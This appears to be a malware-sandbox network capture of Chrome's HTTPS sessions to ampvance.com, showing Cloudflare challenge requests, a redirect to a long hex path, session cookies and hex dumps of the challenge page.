                                                      2024-03-05 13:25:01 UTC474OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1869225531:1709641461:kuxJ_DvE-BzM62NrsAoJvN18Oo0XGBWfSTPIHUFJYAY/85fa6d536af119eb/a96d5f6b92698dc HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:25:08 UTC709INHTTP/1.1 400 Bad Request
                                                      Date: Tue, 05 Mar 2024 13:25:08 GMT
                                                      Content-Type: application/json
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      cf-chl-out: 0nf6O+cHGFelAyuVhDk2DQ==$9ihVmTVfmZDQ9BMCRIKYsw==
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Xmr%2BexqgQZuZn%2FurIC87BBzwJ9V5F9jLSZs6qa6uqe2ogtVUeJgOKLzpa1xSbF1k4KlypJ13JvGX2ytffNhC1lSDahGag%2BrXvgqVH2oAOO0L6eA%2Bb9EKs03tibfKPaU%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6dfb59ab7c6a-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:25:08 UTC12INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                                      Data Ascii: 7invalid
                                                      2024-03-05 13:25:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      28192.168.2.549749104.21.81.2294433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:25:01 UTC1174OUTPOST / HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      Content-Length: 4561
                                                      Cache-Control: max-age=0
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-platform: "Windows"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                      Upgrade-Insecure-Requests: 1
                                                      Origin: https://ampvance.com
                                                      Content-Type: application/x-www-form-urlencoded
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: navigate
                                                      Sec-Fetch-User: ?1
                                                      Sec-Fetch-Dest: document
                                                      Referer: https://ampvance.com/?__cf_chl_tk=ofrAzQxhDkdZHcWLEg_Wi9Vk78IW3.fGcYWaXdEDm1g-1709645074-0.0.1.1-1557
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:25:01 UTC4561OUTData Raw: 35 61 30 63 65 39 33 30 63 31 62 33 34 63 37 30 62 32 33 39 62 31 34 62 34 61 35 36 63 31 66 37 64 33 39 63 34 37 62 32 35 34 38 65 61 32 65 62 66 32 33 62 30 64 33 64 33 65 63 34 31 37 62 63 3d 4c 32 77 6b 45 6d 4f 34 76 64 4b 68 33 62 58 49 73 5f 30 35 65 64 68 30 6a 51 35 4c 4f 77 38 70 4e 46 6a 4b 4a 79 5a 71 35 69 67 2d 31 37 30 39 36 34 35 30 37 34 2d 31 2e 31 2e 31 2e 31 2d 52 5f 65 34 52 49 49 43 77 30 64 56 77 71 56 70 67 54 49 73 59 4f 70 77 50 63 72 75 7a 4f 78 61 6e 67 49 45 66 66 30 6e 64 52 79 6b 2e 7a 6b 4b 38 4e 79 59 30 73 46 67 52 4e 2e 76 47 43 34 68 48 63 77 39 73 31 5f 5f 38 6a 62 5a 2e 50 69 48 63 75 35 78 74 54 4b 79 31 71 67 50 5f 74 6f 65 39 31 4b 61 63 6e 62 6b 4e 52 79 36 58 54 38 59 6e 32 71 6b 76 76 73 30 4f 30 39 76 46 6f 4b
                                                      Data Ascii: 5a0ce930c1b34c70b239b14b4a56c1f7d39c47b2548ea2ebf23b0d3d3ec417bc=L2wkEmO4vdKh3bXIs_05edh0jQ5LOw8pNFjKJyZq5ig-1709645074-1.1.1.1-R_e4RIICw0dVwqVpgTIsYOpwPcruzOxangIEff0ndRyk.zkK8NyY0sFgRN.vGC4hHcw9s1__8jbZ.PiHcu5xtTKy1qgP_toe91KacnbkNRy6XT8Yn2qkvvs0O09vFoK
                                                      2024-03-05 13:25:01 UTC1184INHTTP/1.1 302 Found
                                                      Date: Tue, 05 Mar 2024 13:25:01 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Set-Cookie: cf_clearance=9ukY5ydoUPWFViqUC.G2Zau9oL4gAKunoKgXLN6qDgI-1709645074-1.0.1.1-puuwhjhkEypTXzvnBM1g5Iqmc8RGMwSRmclBcSbSok6Kg9HC2riMGTLYdtgq.1NerTlIrY3RuGM9E7wADehI8Q; path=/; expires=Wed, 05-Mar-25 13:25:01 GMT; domain=.ampvance.com; HttpOnly; Secure; SameSite=None
                                                      set-cookie: PHPSESSID=e09506325d449b6bfb209b4fdc8c5b59; path=/; secure
                                                      expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                      pragma: no-cache
                                                      location: ./cf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d3LOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d4
                                                      x-turbo-charged-by: LiteSpeed
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SCoeDnWizok90%2BWq9bSzw%2FpmGobQ4%2B%2FfAowbuSFIw2rygt5kiPYW7fO05qnK9cb34Uf5wp%2BBO7lOpYZPOmub2d8jy2nKcG5AFdna2DQGtHuB7I2ic8z21RRsz6l4tAw%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6dfade3443aa-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:25:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      29192.168.2.549748104.21.81.2294433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:25:01 UTC932OUTGET /favicon.ico HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://ampvance.com/?__cf_chl_tk=ofrAzQxhDkdZHcWLEg_Wi9Vk78IW3.fGcYWaXdEDm1g-1709645074-0.0.1.1-1557
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:25:01 UTC1290INHTTP/1.1 403 Forbidden
                                                      Date: Tue, 05 Mar 2024 13:25:01 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Content-Length: 16332
                                                      Connection: close
                                                      Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                      Cross-Origin-Embedder-Policy: require-corp
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Cross-Origin-Resource-Policy: same-origin
                                                      Origin-Agent-Cluster: ?1
                                                      Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                      Referrer-Policy: same-origin
                                                      X-Frame-Options: SAMEORIGIN
                                                      cf-mitigated: challenge
                                                      cf-chl-out: RLezU/NWRXRBMSQxLb/PxI9JzSzbG/U4Q51udhzv3EPNAJpajI+tYNtYOUZgia6GoRlb78LpxdHhf06cTxcLYbZ51ZtwGbjgD0cKE9zGfXal4EOg9S29Qyb5mldcdlhiw65J3yzrv4ePmBWm0hh4DQ==$CDyCn0LJSngrpDjzGsLZZw==
                                                      Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                      2024-03-05 13:25:01 UTC399INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 62 76 4c 76 34 57 34 6b 4b 61 4c 54 4c 41 52 53 39 39 43 37 4d 6a 6b 75 70 48 46 56 4b 4e 76 69 65 76 63 4e 4c 4e 79 64 6f 73 38 58 58 77 68 43 6c 78 65 34 44 43 37 71 65 37 45 4d 43 46 64 47 72 32 6e 65 52 4d 73 73 38 71 6e 46 31 76 32 6b 45 48 33 32 49 6a 51 65 5a 4d 51 25 32 46 32 49 79 31 59 4f 76 78 67 6e 66 4f 74 76 65 6b 41 42 63 6a 52 6c 36 6e 75 78 58 4c 34 69 46 30 30 6f 38 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20
                                                      Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bvLv4W4kKaLTLARS99C7MjkupHFVKNvievcNLNydos8XXwhClxe4DC7qe7EMCFdGr2neRMss8qnF1v2kEH32IjQeZMQ%2F2Iy1YOvxgnfOtvekABcjRl6nuxXL4iF00o8%3D"}],"group":"cf-nel","max_age":604800}NEL:
                                                      2024-03-05 13:25:01 UTC1049INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70
                                                      Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewp
                                                      2024-03-05 13:25:01 UTC1369INData Raw: 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54
                                                      Data Ascii: iIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOT
                                                      2024-03-05 13:25:01 UTC1369INData Raw: 2e 64 61 72 6b 20 2e 62 69 67 2d 62 75 74 74 6f 6e 2c 62 6f 64 79 2e 64 61 72 6b 20 2e 70 6f 77 2d 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 36 39 33 66 66 3b 63 6f 6c 6f 72 3a 23 31 64 31 64 31 64 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39
                                                      Data Ascii: .dark .big-button,body.dark .pow-button{background-color:#4693ff;color:#1d1d1d}body.dark #challenge-success-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9
                                                      2024-03-05 13:25:01 UTC1369INData Raw: 69 76 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 35 39 35 39 35 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 62 6f 64 79 2e 6c 69 67 68 74 20 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 66 63 35 37 34 61 7d 62 6f 64 79 2e 6c 69 67 68 74 20 2e 62 69 67 2d 62 75 74 74 6f 6e 2c 62 6f 64 79 2e 6c 69 67 68 74 20 2e 70 6f 77 2d 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 33 36 38 31 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 30 30 33 36 38 31 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 62 6f 64 79 2e 6c 69 67 68 74 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76
                                                      Data Ascii: iv{border-color:#595959 transparent transparent}body.light .font-red{color:#fc574a}body.light .big-button,body.light .pow-button{background-color:#003681;border-color:#003681;color:#fff}body.light #challenge-success-text{background-image:url(data:image/sv
                                                      2024-03-05 13:25:01 UTC1369INData Raw: 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 63 6f 6c 6f 72 20 2e 31 35 73 20 65 61 73 65 7d 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 38 72 65 6d 20 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 68 65 69 67 68 74 3a 32 72 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 72 65 6d 3b 77 69 64 74 68 3a 32 72 65 6d 7d 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 20 37 32 30 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34
                                                      Data Ascii: oration:none;transition:color .15s ease}a:hover{color:#ee730a;text-decoration:underline}.main-content{margin:8rem auto;max-width:60rem;width:100%}.heading-favicon{height:2rem;margin-right:.5rem;width:2rem}@media (width <= 720px){.main-content{margin-top:4
                                                      2024-03-05 13:25:01 UTC1369INData Raw: 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 34 70 78 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75
                                                      Data Ascii: 1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);padding-left:34px}#challenge-error-text,#challenge-success-text{background-repeat:no-repeat;background-size:contain}#challenge-success-text{backgrou
                                                      2024-03-05 13:25:01 UTC1369INData Raw: 3a 31 30 30 25 7d 2e 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 35 72 65 6d 3b 77 69 64 74 68 3a 35 30 25 7d 2e 64 69 61 67 6e 6f 73 74 69 63 2d 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 7d 2e 66 6f 6f 74 65 72 20 2e 72 61 79 2d 69 64 7b 74
                                                      Data Ascii: :100%}.footer-inner{border-top:1px solid #d9d9d9;padding-bottom:1rem;padding-top:1rem}.clearfix:after{clear:both;content:"";display:table}.clearfix .column{float:left;padding-right:1.5rem;width:50%}.diagnostic-wrapper{margin-bottom:.5rem}.footer .ray-id{t
                                                      2024-03-05 13:25:01 UTC1369INData Raw: 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 33 37 35 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 77 72 61 70 70 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 22 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 64 69 76 20 69 64 3d 22 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 32 22 3e 3c 73 70 61 6e 20 69 64 3d 22 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 22 3e 45 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 20 61 6e 64 20 63 6f 6f 6b 69 65 73 20 74 6f 20 63 6f 6e 74 69 6e 75 65
                                                      Data Ascii: tp-equiv="refresh" content="375"></head><body class="no-js"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div id="challenge-error-title"><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue
                                                      2024-03-05 13:25:01 UTC1369INData Raw: 31 62 45 57 69 54 59 56 73 74 5a 55 7a 47 4d 4d 73 69 41 57 5f 64 5f 74 68 45 50 65 48 49 30 6c 45 44 30 70 67 7a 65 79 55 64 43 31 46 32 6d 4b 64 36 52 66 74 45 69 35 51 5a 6f 42 64 74 38 37 54 31 71 48 6e 35 32 4c 44 4a 4f 38 30 43 2e 58 6e 59 6a 4f 55 67 64 7a 45 58 43 37 69 54 52 63 37 48 68 62 4b 59 75 6a 4a 50 68 55 44 41 6b 70 6f 6d 76 6f 51 4c 55 49 79 48 57 59 78 54 54 73 42 51 62 6b 58 6a 76 44 75 55 43 65 32 65 72 6f 65 33 30 4d 4d 50 4f 62 7a 64 4b 43 69 44 58 76 54 59 7a 56 79 73 6e 42 75 55 56 4e 35 43 52 4e 75 69 68 6f 4c 56 45 31 79 79 4d 47 52 5a 42 66 6b 67 31 44 6b 7a 74 65 47 6f 67 44 38 54 6a 6a 7a 50 43 70 71 5a 38 31 4e 54 55 4e 69 59 32 79 4e 7a 71 5a 6a 73 64 31 6f 70 4d 6b 54 4d 49 2e 6e 42 32 77 33 75 6e 72 2e 69 41 6d 42 48 4a
                                                      Data Ascii: 1bEWiTYVstZUzGMMsiAW_d_thEPeHI0lED0pgzeyUdC1F2mKd6RftEi5QZoBdt87T1qHn52LDJO80C.XnYjOUgdzEXC7iTRc7HhbKYujJPhUDAkpomvoQLUIyHWYxTTsBQbkXjvDuUCe2eroe30MMPObzdKCiDXvTYzVysnBuUVN5CRNuihoLVE1yyMGRZBfkg1DkzteGogD8TjjzPCpqZ81NTUNiY2yNzqZjsd1opMkTMI.nB2w3unr.iAmBHJ


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      30192.168.2.549750104.21.81.2294433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:25:01 UTC1381OUTGET /cf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d3LOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d4 HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      Cache-Control: max-age=0
                                                      Upgrade-Insecure-Requests: 1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: navigate
                                                      Sec-Fetch-User: ?1
                                                      Sec-Fetch-Dest: document
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-platform: "Windows"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                      Referer: https://ampvance.com/?__cf_chl_tk=ofrAzQxhDkdZHcWLEg_Wi9Vk78IW3.fGcYWaXdEDm1g-1709645074-0.0.1.1-1557
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: cf_clearance=9ukY5ydoUPWFViqUC.G2Zau9oL4gAKunoKgXLN6qDgI-1709645074-1.0.1.1-puuwhjhkEypTXzvnBM1g5Iqmc8RGMwSRmclBcSbSok6Kg9HC2riMGTLYdtgq.1NerTlIrY3RuGM9E7wADehI8Q; PHPSESSID=e09506325d449b6bfb209b4fdc8c5b59
                                                      2024-03-05 13:25:02 UTC626INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:25:02 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      vary: Accept-Encoding
                                                      x-turbo-charged-by: LiteSpeed
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uOUSu2hEUE%2FcN95CbuxPE6%2FWY5RkVPCgIUmw4AoP0VVzMr%2FR0wJvBG6y8uFnZgPyBq4TQQSL6CCrYauPQ3E%2BS6W97erFz4TQER04lZZugtyPJP5C1pG4VdpPAGkl2y0%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6e001a250f85-EWR
                                                      alt-svc: h3=":443"; ma=86400
